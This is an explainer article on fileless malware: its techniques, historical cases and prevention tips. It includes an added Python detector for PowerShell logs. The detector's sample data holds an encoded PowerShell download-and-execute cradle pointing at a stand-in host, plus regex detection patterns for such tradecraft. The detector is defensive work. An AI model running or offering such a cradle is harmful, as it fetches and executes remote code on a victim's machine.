The cyberworld is rife with security incidents. While most cyberattacks need some type of bait to infiltrate your system, the dauntless fileless malware lives off the grid and infects by turning your legitimate software against itself.

But how does the fileless malware attack if it does not use any files? What are the most common techniques it employs? And can you protect your devices from fileless malware?

How Does Fileless Malware Attack?

Fileless malware attacks by exploiting pre-existing vulnerabilities in the software you already have installed.

Common examples include exploit kits that target browser vulnerabilities to make the browser run malicious code, abuse of Microsoft's PowerShell utility, and attacks that target macros and scripts.

Since the code for these attacks is never stored in a file or installed on the victim's machine, it is loaded directly into memory as a set of system commands and runs immediately.

The absence of executable files on disk makes it difficult for traditional antivirus solutions to spot these attacks. Naturally, this makes fileless malware all the more dangerous.

Common Techniques Used by Fileless Malware

Fileless malware does not need its own files on disk to launch, but it does rely on modifying the native environment and tools of the system it attacks.

Here are some common techniques that fileless malware uses to target devices.

Exploit Kits

Exploits are pieces of code or command sequences that take advantage of a specific vulnerability, and an exploit kit is a collection of such exploits. Exploits are the preferred way to launch a fileless attack because their payload can be injected directly into memory without anything being written to disk.

An exploit kit attack is launched in the same manner as a typical attack: the victim is lured through phishing emails or social engineering tactics. Most kits include exploits for a number of pre-existing vulnerabilities in the victim's system, plus a management console that lets the attacker control the kit.

Malware That Resides In Memory

A type of malware known as registry resident malware is used extensively in fileless attacks. This malicious code is configured to launch every time the operating system starts and hides inside the Windows registry itself rather than in a file on disk.

Once fileless malware is installed in your Windows registry, it can remain there permanently, avoiding detection.

Memory-Only Malware

This type of malware only resides inside memory.

Attackers mostly employ widely used system administration and security tools—including PowerShell, Metasploit, and Mimikatz—to inject their malicious code into your computer's memory.
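As an added example (not code from the original article), the Python detector below runs over constructed PowerShell script block (Event ID 4104) and process creation (Event ID 4688) log lines, decodes any -EncodedCommand payload, and flags the in-memory tradecraft described above. The event IDs are real Windows IDs; the one-line log format and the sample lines are constructed for the demonstration.

```python
import base64
import re

# Constructed sample log lines (not real telemetry). PowerShell expects
# -EncodedCommand payloads as base64 of UTF-16LE text, so build one that way.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_LOGS = [
    "4688 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "-NoProfile -WindowStyle Hidden -EncodedCommand " + ENCODED,
    "4104 Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "4104 [System.Reflection.Assembly]::Load($bytes); Invoke-Expression $cmd",
    "4688 C:\\Windows\\System32\\notepad.exe",
]

# Indicators typical of memory-only PowerShell tradecraft (download cradles,
# reflective assembly loading, hidden windows, encoded command lines).
INDICATORS = {
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
}

def decode_encoded_command(line):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or '' if none."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", line, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def scan_line(line):
    """Return the set of indicator names matched by a log line, including any decoded payload."""
    text = line + " " + decode_encoded_command(line)
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def scan_logs(lines):
    """Return (line, sorted indicators) pairs for every line that matched at least one indicator."""
    return [(ln, sorted(scan_line(ln))) for ln in lines if scan_line(ln)]
```

Decoding the payload before matching is what catches the first sample: its download cradle is invisible in the raw command line.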

Stolen Credentials

Stealing credentials to carry out a fileless attack is very common. Stolen credentials let an attacker operate on a device under the guise of the real user.

Once attackers gain access to a device with a stolen credential, they can use native tools such as Windows Management Instrumentation (WMI) or PowerShell to carry out the attack. Attackers also commonly create their own user accounts to retain access to the system.

Examples of Fileless Attacks

Fileless malware has been around for quite a while but only emerged as a mainstream attack in 2017 when kits that integrate calls to PowerShell were created by threat actors.

Here are some interesting examples of fileless malware, some of which you'll no doubt have heard about.

The Dark Avenger

This is a precursor to fileless malware attacks. Discovered in September 1989, it required a file as its initial delivery point but later operated entirely in memory.

The main aim behind this attack was to infect executable files every time they were run on an infected computer. Even the copied files would get infected. The creator of this attack is famously known as the "Dark Avenger".

Frodo

Frodo is not a fileless attack in the true sense, but it was the first virus loaded into a computer's boot sector, which makes it partially fileless.

It was discovered in October 1989 as a harmless prank with an aim to flash a message "Frodo Lives" on the screens of infected computers. However, due to the badly written code, it actually turned into a destructive attack for its hosts.

Operation Cobalt Kitty

This famous attack was discovered in May 2017 and was executed on the system of an Asian corporation.

The PowerShell scripts used in this attack communicated with an external command-and-control server, which enabled the attackers to launch a series of follow-on attacks, including deployment of the Cobalt Strike Beacon payload.

Misfox

This attack was identified by the Microsoft Incident Response team back in April 2016. It employs fileless techniques: running commands through PowerShell and gaining persistence by hiding in the registry.

After the Microsoft security team spotted this attack, protection against this malware was bundled into Windows Defender.

WannaMine

This attack mines cryptocurrency on the host computer.

The attack was first spotted in mid-2017 while running in memory without any traces of a file-based program.

Purple Fox

Purple Fox was originally created in 2018 as a fileless downloader trojan that required an exploit kit to infect devices. It resurfaced in a reconfigured form with an additional worm module.

The attack is initiated by a phishing email that delivers the worm payload which automatically scans for and infects Windows-based systems.

Purple Fox can also use brute force attacks by scanning for vulnerable ports. Once the target port is found, it is infiltrated to propagate the infection.

How to Prevent Fileless Malware

We've established how dangerous fileless malware can be, especially because some security suites can't detect it. The following five tips can help mitigate any kind of fileless attack.

1. Be Careful With Email

Email is the biggest entry point for fileless attacks as naive email users can be lured into opening malicious email links.

Don't click on links you're not 100 percent sure about. Check where the URL actually leads before opening it, and judge whether you can trust it based on your relationship with the sender and the rest of the email's contents.

Also, no attachments sent from unknown sources should be opened, specifically the ones containing downloadable files like PDFs and Microsoft Word documents.

2. Don't Kill JavaScript

JavaScript is a common vector for fileless malware, but disabling it completely does not help.

Besides the fact that most pages you visit will be empty or missing elements, Windows also ships a built-in JavaScript interpreter that attackers can invoke outside the browser, so turning JavaScript off in the browser does not remove that capability.

The biggest drawback is that disabling JavaScript gives you a false sense of security against fileless malware.

3. Disable Flash

Flash can be abused to launch Windows PowerShell and execute commands from the command line while the attack runs entirely in memory.

To properly protect from fileless malware, it is important to disable Flash unless really necessary.

4. Employ Browser Protection

Protecting your home and work browsers is the key to preventing fileless attacks from spreading.

For work environments, create an office policy that only allows one browser type to be used for all desktops.

Installing browser protection such as Windows Defender Application Guard is very helpful. Part of Office 365, this software was written with specific procedures to protect against fileless attacks.

5. Implement Robust Authentication

The main culprit behind the spread of fileless malware is not PowerShell itself, but rather weak authentication.

Implementing robust authentication policies and limiting privileged access by implementing the Principle Of Least Privilege (POLP) can significantly reduce the risk of fileless malware.

Beat Fileless Malware

Leaving no trail behind, fileless malware leverages the built-in "safe" tools in your computer to carry out the attacks.

However, the best way to beat fileless or any malware is to gain awareness and understand the different techniques used in carrying out these attacks.